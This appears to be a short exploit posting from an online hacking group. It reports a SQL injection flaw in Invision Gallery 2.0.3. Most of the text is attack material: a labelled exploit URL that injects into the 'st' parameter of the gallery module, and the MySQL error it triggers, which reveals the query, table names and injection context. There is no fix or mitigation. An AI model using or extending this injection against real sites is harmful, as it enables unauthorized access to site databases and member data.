SQL In Invision Gallery 2.0.3

Credit: By aLMaSTeR HaCKeR [ almaster@hotmail.com]

Vulnerable: Invision Gallery 2.0.3

EXPLIOT:

http://www.site.com/index.php?automodule=gallery&cmd=sc&cat=26&sort_key=date&order_key=DESC&prune_key=30&st=|aLMaSTeR

The Error:

mySQL query error: SELECT i.*, m.members_display_name AS name, m.id AS mid, 
r.id as rated 
                FROM ibf_gallery_images i   
                    LEFT JOIN ibf_members m ON ( m.id=i.member_id ) 
                    LEFT JOIN ibf_gallery_ratings r ON ( r.img_id=i.id AND 
r.member_id=0 ) 
                WHERE  category_id=26   AND  i.approved=1      
                    GROUP BY i.id 
                ORDER BY pinned DESC, date DESC , i.id DESC  LIMIT ', 20 
                

SQL error: You have an error in your SQL syntax; check the manual that 
corresponds to your MySQL server version for the right syntax to use near '', 
20' at line 7 
SQL error code: 
Date: Sunday 30th of October 2005 04:53:19 PM 

Thanks TO MY FRIENDS IN S4A.CC

almaster@s4a.cc or almaster@hotmail.com